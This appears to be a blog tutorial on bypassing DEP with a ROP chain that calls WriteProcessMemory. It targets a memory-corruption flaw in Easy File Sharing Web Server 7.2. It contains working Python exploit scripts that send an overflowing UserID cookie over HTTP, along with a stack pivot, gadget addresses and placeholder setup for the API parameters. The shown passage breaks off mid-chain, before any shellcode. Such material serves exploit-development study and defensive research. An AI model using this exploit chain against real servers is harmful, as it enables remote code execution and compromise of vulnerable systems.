ROP/COP and other code reuse apparatuses are very important mitigation bypass techniques, due to their versatility. Binary exploit mitigations have come a long way since DEP. Notably, mitigations such as CFG, upcoming XFG, ACG, etc. have posed an increased threat to exploit writers as time has gone on. ROP still has been the “Swiss army knife” to keep binary exploits alive. ROP can result in arbitrary write and arbitrary read primitives - as we will see in the upcoming post. Additionally, data only attacks with the implementation of ACG have become crucial. It is possible to perform data only attacks, although expensive from a technical perspective, by writing payloads fully in ROP.

What This Blog Assumes and What This Blog ISN’T

If you are interested in a remote bypass of ASLR and a 64-bit version of bypassing DEP, I suggest reading a previous blog of mine on this topic (although, undoubtedly, there are better blogs on this subject).

This blog will not address ASLR or 64-bit exploitation (read my previous post if that is what you are looking for) - and will be utilizing non-ASLR compiled modules, as well as the x86 __stdcall calling convention (technically an “ASLR bypass”, but in my opinion only an information leak = true ASLR bypasses).

Why are these topics not being addressed? This post aims to focus on a different, less documented approach to executing code with ROP. As such, I find it useful to use the most basic, straightforward example to hopefully help the reader fully understand a concept. I am fully aware that it is 2020 and I am well aware mitigations such as CFG are more common. However, generally the last step in exploitation, no matter HOW many mitigations there are (unless you are performing a data only attack), is bypassing DEP (in user mode or kernel mode). This post aims to address the latter portion of the last sentiment - and expects the reader already has an ASLR bypass primitive and a way to pivot to the stack.

Expediting The Process

The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory corruption vulnerability as a result of an HTTP request.

The offset to SEH is 2563 bytes. Instead of using a pop <reg> pop <reg> ret sequence, as is normally done on a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This will take the stack, where it is currently not controlled by us, and change the address to an address on the stack that we control - and then return into it.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain
crash += struct.pack('<L', 0x90909090)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp 0x10022869. After sending the exploit POC - we will need to view the contents of the exception handler with the WinDbg command !exchain.

As a breakpoint has already been set on the address inside of SEH, all that is needed to pass the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the stack.

As a point of contention, we have about 980 bytes to work with.

The Call to WriteProcessMemory()

What is the goal of this method of bypassing DEP? The goal here is to not to dynamically change permissions of memory to make it executable - but to instead write our shellcode, dynamically, to already executable memory.

As we know, when DEP is enabled, memory is either writable or executable - but not both at the same time. The previous sentiment about writing shellcode, via WriteProcessMemory(), to executable memory is a bit contradictory knowing this. If memory is executable, adhering to DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily marking memory pages as RWX while data is being written to a destination - even if that destination doesn’t have writable permissions. After the write succeeds, the memory is then marked again as execute only.

From an adversary’s perspective, this means something. Certain shellcodes employ encoding mechanisms to bypass character filtering. If this is the case, encoded shellcode which is dynamically written to execute only memory will fail when executed. This is due to the encoded shellcode needing to “write itself” over adjacent process memory to decode. Since pages are execute only, and we do not have the WriteProcessMemory() “pass” to write to execute only memory anymore, an access violation will occur. Something to definitely keep in mind.

Let’s take a look at the call to WriteProcessMemory() firstly, to help make sense of all of this (per Microsoft Docs)

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

Let’s break down the call to WriteProcessMemory() by taking a look at each function argument.

  1. HANDLE hProcess: According to Microsoft Docs, this parameter is a handle to the desired process in which a user wants to write to the process memory. A handle, without going too much into detail, is a “reference” or “index” to an object. Generally, a handle is used as a “proxy” of sorts to access an object (this is especially true in kernel mode, as user mode cannot directly access kernel mode objects). We will look at how to dynamically resolve this parameter with relative ease. Think of this as “don’t talk to me, talk to my assistant”, where the process is the “me” and the handle is the “assistant”.
  2. LPVOID lpBaseAddress: This parameter is a pointer to the base address in which a write is desired. For example, if the region of memory you would like to write to was 0x11223344 - 0x11223355, the argument passed to the function call would be 0x11223344.
  3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
  4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode + NOPs, if necessary, will be).
  5. SIZE_T *lpNumberOfBytesWritten: This parameter is similar to the VirtualProtect() parameter lpflOldProtect, which inherits the old permissions of modified memory. However, our parameter inherits the number of bytes written. This will need to be a memory address, within the process space, that is writable.

Preserving a Stack Address

One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually - each ROP gadget is appended with a ret instruction. ret, from a technical perspective, will take the value pointed to by RSP (or ESP in this case), which will be the next ROP gadget on the stack, and load it into RIP (EIP in this case). Since ROP must be performed on the stack, and due to the dynamic nature of the stack, the virtual memory addresses associated with the stack are also dynamic.

As seen below, when the stack pivot is successfully performed, the virtual address of the stack is 0x029a68dc.

Restarting the application and pivoting to the stack again, the virtual address of the stack is at 0x028068dc.

At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of each module, and their static nature - the stack still seems to change! Although the stack is dynamically being resolved to seemingly “random” and “volatile to the duration of the process” memory - there is a way around this. If we can use a ROP gadget, or set of gadgets, properly - we can dynamically store an address around the stack into a CPU register.

Let’s start our ROP chain by preserving an address near the current stack pointer.

As you may or may not know, the base pointer (EBP) points to the “bottom” of the current stack frame (we will refer to the current stack frame as “the stack”). This means that EBP should be relatively close to ESP. We can validate this in WinDbg by viewing the current state of the CPU registers after the stack pivot.

After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use rp++ by taking a look at my last ROP blog post) - a nice gadget resides in sqlite3.dll that can help us preserve the address of EBP into another “common” register, which has more useful ROP gadgets as we will see later on, such as EAX.

0x61c05e8c: xchg eax, ebp ; ret  ;  (1 found)

Replace the NOPs in the previous PoC script, under the “Begin ROP chain” comment, with the above address. After firing off the updated PoC, we land on our intended ROP gadget.

After executing the above gadget, EAX is now loaded with an address near the current stack.

Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.

Although EAX is relatively close to ESP - it is still a decent ways away. Currently, EAX (which now contains the old value of EBP) is 0xfec bytes away from ESP.

To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.

Why ESP + 0x38 instead of just ESP you ask? This is a “preparatory” procedure (manipulating EAX to contain the address of ESP + 0x38).

As we will see later on, we would like to preserve an address around ESP into another “common” register, ECX. ECX is a register that is used as a “counter” (although technically it is a general purpose register). This means that ECX generally is a part of some more useful ROP gadgets.

In order to do this, the stack will eventually need to be increased by 0x24 bytes to get the value (technically future value) of ESP into ECX, due to the nature of the ROP gadgets available within the process memory. A ROP gadget will inadvertently perform an add esp, 0x24, resulting in collateral damage to get what we need accomplished, accomplished. There will be 4 ROP gadgets (plus an additional DWORD that will be “popped” into a register), for a total of 0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp, 0x24 gadget is executed (0x38 - 0x24 = 0x14).

This is reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24, because we will need 0x14 bytes worth of ROP gadgets between then and now. By the time the ROP gadgets before the add esp, 0x24 instruction are executed, the value in EAX will be ESP + 0x24. However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp, 0x24 instruction, EAX will contain a value of ESP + 0x10.

Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of ESP after the ESP + 0x38 stack manipulation occurs - we will prepare EAX in advance.

Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time being.

0x10018606: pop ecx ; ret  ;  (1 found)
0xffffefe0 (Value to be popped into EAX. This is the negative representation of the distance between the current value of EAX and ESP + 0x38). 
0x1001283e: sub eax, ecx ; ret  ;  (1 found)

Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded 0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX will contain NULL bytes - which will kill our exploit. Instead, we will use the negative representation of numbers and perform subtraction in order to get around this problem.

After the aforementioned gadget of exchanging EBP and EAX, program execution hits the pop ecx gadget.

The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.

Program execution then transfers to the sub eax, ecx ROP gadget, which will place the difference into the EAX register.

This yields our desired result.

Note that 0xCCCCCCCC is denoted as a visual for where we hope our program execution resumes at after all of this craziness. Our goal is for when the last ret occurs, it returns into this DWORD.

The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do this for us.

0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave  ; ret  ;  (1 found)

This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur - which is meaningless because ECX and EAX already contain the same value - meaning this part of the gadget basically just serves as a “NOP” of sorts. ESP then gets raised by 0x24 bytes, which we can compensate for - so this isn’t an issue. pop ebx can be compensated for as well, but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution flow off.

leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.

mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.

We know that currently EAX contains our target address. We also can recall from earlier that EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes - it would set ESP to ESP + 0x24 (at the time of the instruction executing) because of the mov esp, ebp instruction - which sets ESP to whatever EBP is. Due to the add esp, 0x24 gadget that occurs before the leave instruction - this would actually end up setting ESP to ESP, which is what we want. The goal here is to restore ESP back to our controlled data, which consists of our ROP gadgets.

It is a bit of a mouthful and “mind bender” of sorts - so do not worry if it is hazy or confusing at the moment. Viewing this step by step in the debugger will help make sense of all of this.

Note, after each gadget - obviously the value of ESP changes. For completeness sake, until we hit the add esp, 0x24 gadget - we will refer to the “target” ESP + 0x38 address as ESP + 0x38 (even though the offset will technically shrink after each gadget is executed).

First, as mentioned above, we need to get the value in EAX into EBP to prepare for the leave instruction.

0x61c30547: add ebp, eax ; ret  ;  (1 found)

How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0, which doesn’t alter it in any way, and the result of the addition is placed into EBP - essentially “moving” the address into EBP.

Let’s step through all of this in WinDbg - to make things a bit more clear.

First, program execution reaches the add ebp, eax instruction.

EBP currently is set to 0 and EAX is set to ESP + 0x38

Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.

After EBP is prepared, program execution reaches the next ROP gadget.

After stepping through the mov ecx, eax gadget - ECX and EAX are now both set to ESP + 0x38.

Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as ECX (which is already equal to EAX) is placed into EAX.

Taking a look on the stack now, we can see our compensation for add esp, 0x24 and pop ebx between the address before 0xCCCCCCCC

Program executing has also reached the add esp, 0x24 instruction.

Stepping through the instruction, the stack as been set to the same values in EAX, ECX, and EBP.

Then, pop ebx clears the last bit of “padding” on the stack.

After all of this has occurred, the leave instruction is loaded up for execution.

leave ; ret is executed, and the execution of our ROP chain resumes its course - all while preserving ESP into ECX and EAX!

WriteProcessMemory() Parameters

Recall that we are dealing with the x86 architecture, meaning function calls go through __stdcall instead of __fastcall. This means that instead of placing our function arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on - we can just simply place our parameters on the stack, as such.

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Let’s talk about where these parameters come from.

To “bypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t) - we can leverage the Import Address Table (IAT).

Whenever a program calls a Windows API function - it does not do so directly. A special table, within the process space, known as the IAT essentially contains pointers to each needed API function.

The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.

As is seen in the image above, the IAT just contains pointers to Windows API functions. Meaning each of these functions points to a Windows API function.

We have “the base address” of each module (in reality, each module is just not compiled with ASLR) - so that is no problem. However, the value that each of these functions points to (which is a Windows API function) will change upon reboot.

The way to get around this, would be to load one of these IAT entries into a register we control (such as ECX) and then perform a mov ecx, dword ptr [ecx] instruction - an arbitrary read.

This would extract whatever ECX points to (which is a Windows API function) and place it into ECX. Even though Windows will randomize the addresses of the API, we can still leverage the fact each IAT will always point to the same Windows API function (even if the address of the API changes) to make sure this is not a problem.

Although the IAT for this application doesn’t directly contain a function pointer to kernel32WriteProcessMemory - it does contain pointers to other kernel32.dll pointers, such as kernel32!WriteFileImplementation. We also know that the distance between each function with a DLL DOESN’T CHANGE. This means, the distance between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always remain the same for the current patch level and OS version.

This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.

crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)

The next “parameter” is not really even a parameter at all. Similarly to my last ROP post, this will be used as the address in which program execution will transfer to AFTER the call to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.

Why 0x61c72530 specifically?

sqlite3.dll is a module of the application - meaning it is a part of process memory. Since this DLL is required for the application to work, we can target it as a place to write our shellcode. With this method of ROP, we need to find an executable portion of memory within the application and its modules. Then, using the call to kernel32!WriteProcessMemory - we will write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in WinDbg, we can determine the .text section of the portable executable has execute permissions. Also recall that even without write permissions, we can still write our shellcode if we “proxy” the write through the API call.

Viewing the .text section address - we can see that the address chosen is just an executable “code cave” that is not initialized to any memory - meaning that if we corrupt this memory, the program shouldn’t care.

This means, after the function call is completed and our shellcode is written here - program execution will transfer to this address.

crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)

The handle parameter is quite easy to fill - we can even use a static value. According to Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically, it returns a “pseudo handle” to the current process. A pseudo handle, denoted by -1 or 0xFFFFFFFF, is “special” constant that refers to a handle to the current process. This means, whenever a Windows API function requests a handle (generally in user mode), passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since we would like to write our shellcode to memory within the process space - passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we would like to write the memory to virtual memory within the current process space.

crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 

lpBaseAddress will be the address of our shellcode, as already outlined by the “return” parameter.

crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)

lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We will dynamically resolve this with ROP gadgets.

crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 

nSize will be the size of our shellcode.

crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Lastly, lpNumberofBytesWrittne will be any writable address.

Let’s ROP v2!

We will be using what some have dubbed the “pointer” method of ROP (when it comes to x86 at least), where we will place these parameter “placeholders” on the stack and then dynamically change what these parameters point to in order to make a successful function call. Here is the PoC we will be using.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX vai "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack)  - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

The above PoC places the parameters on the stack and also performs a “jump” over them with add esp, 0x1C. Let’s examine this in the debugger.

The following is the state of the stack - with the kernel32!WriteProcessMemory parameters outlined in red.

The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we can see the stack moves further down.

We can see that we have moved further into our buffer, where our future ROP gadgets will reside. The parameters for the function call are now “behind” where program execution is - meaning we will not inadvertently corrupt these parameters because they are not within the current execution flow.

Now that this is out of the way - we can “officially” begin our ROP chain to obtain code execution.

lpBuffer

The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else. Since we have control of the stack, we will just preemptively place our shellcode there. This is where the headache of storing an address near the stack in EAX and ECX will come into play.

As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.

The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.

Let’s say we get the parameter placeholder’s location (e.g. the virtual memory address, not the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be reading the value 0x2826930. However, if we read the value of dword ptr [ecx] instead - we would be reading the actual value of 0x11111111.

The first part of the image above shows the value of the address itself. The second part of the image shows what happens when we “dereference” (using poi in WinDbg), or extract the value a memory address is pointing to. We can leverage this, by using an arbitrary write primitive. When we get the address of the lpBuffer parameter into ECX - we then will not overwrite ECX, but rather dword ptr [ecx] - which will force the address on the stack (which contains the parameter placeholder) to point to something other than 0x11111111.

Remember - every time the process is terminated and restarted - the virtual memory on the stack changes. This is why we need to dynamically resolve this parameter, instead of hardcoding an address.

We will use the following ROP gadgets, in order to make ECX contain the stack address holding the lpBuffer parameter placeholder.

crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

Two things about the above ROP gadgets. First, the clc instruction.

clc is an assembly instruction that clears the “carry” flag (the CF register). None of our ROP gadgets, now or later, depend on the state of this flag - so it is okay that this instruction resides in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are not using the EDX register for anything - so this instruction will not consequently disrupt what we are trying to achieve.

Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10 hexadecimal) - even though the parameter placeholder for lpBuffer is located 0x18 bytes away (24 decimal bytes).

This is again a “preparatory” procedure for our future ROP gadgets. We need a gadget, similar to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the stack address of our shellcode and dword ptr [ecx] contains the stack address which is currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our shellcode.

However, there were no such gadgets that were found easily in the process memory. The closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX to 0x10 instead of 0x18 - due to the gadget overwriting ECX’s pointer at an offset of 0x8 (0x18 - 0x10 = 0x8).

The key is now to give some padding between the space on the stack for our future ROP gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on the stack for remaining ROP gadgets. This will allow us to “simulate” the rest of our ROP gadgets and choose a place on the stack that our shellcode will go, and start performing these calculations now. Think of these 0x300 bytes as “ROP gadget placeholders”. If perhaps we would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we would move our shellcode down lower. We will “aim” for 0x300 bytes down the stack, and we will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following ROP gadgets can accomplish loading the location of our “shellcode” (future shellcode) into EAX.

crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 (0x2dc) bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

The location where our shellcode will be (your location can be different, depending on how far down the stack you wish to place it) is 0x2dc bytes away from the value in EAX. To load our shellcode value into EAX, we need to increase it by 0x2dc bytes. Obviously, this is too much for just consecutive inc eax gadgets. Additionally, if we directly add to EAX - the NULL byte problem would kill our exploit. This is because a 32-bit register, like EAX, needs the value 0x000002dc to completely fill its contents. To address this, we can use negative numbers and subtraction to yield the same result!

The negative representation of 0x2dc will be loaded into ESI. We will then need to also compensate for the add esp + 0x8 instruction. To do this, we will add 0x8 bytes of padding so no gadgets get “jumped over”. Then, we will subtract the value in ESI from EAX - and place the difference in EAX. This will result in the address of where our shellcode will go being placed into EAX. Additionally, we need compensate for two pop gadgets.

Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating gadget(s).

Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter - as expected.

Program execution then redirects to the EAX manipulation routine.

The intended negative value of 0x2dc is placed into ESI.

The value is then subtracted and the difference is placed in EAX! We have successfully loaded the address of where our shellcode will go, further down the stack, into EAX.

Note, the address where our shellcode will go is denoted with NOPs in the above image for visual effect. This was done in the debugger to outline the process taken here.

The last step is to utilize the following ROP gadget to change the lpBuffer parameter placeholder to point to the legitimate parameter (which is the shellcode location down the stack).

crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the gadget in question.

As we can already see from the image above, 0x11111111 (which is the parameter placeholder for lpBuffer), is going to be what is overwritten with the contents of EAX (which contains the stack address which points to our shellcode.

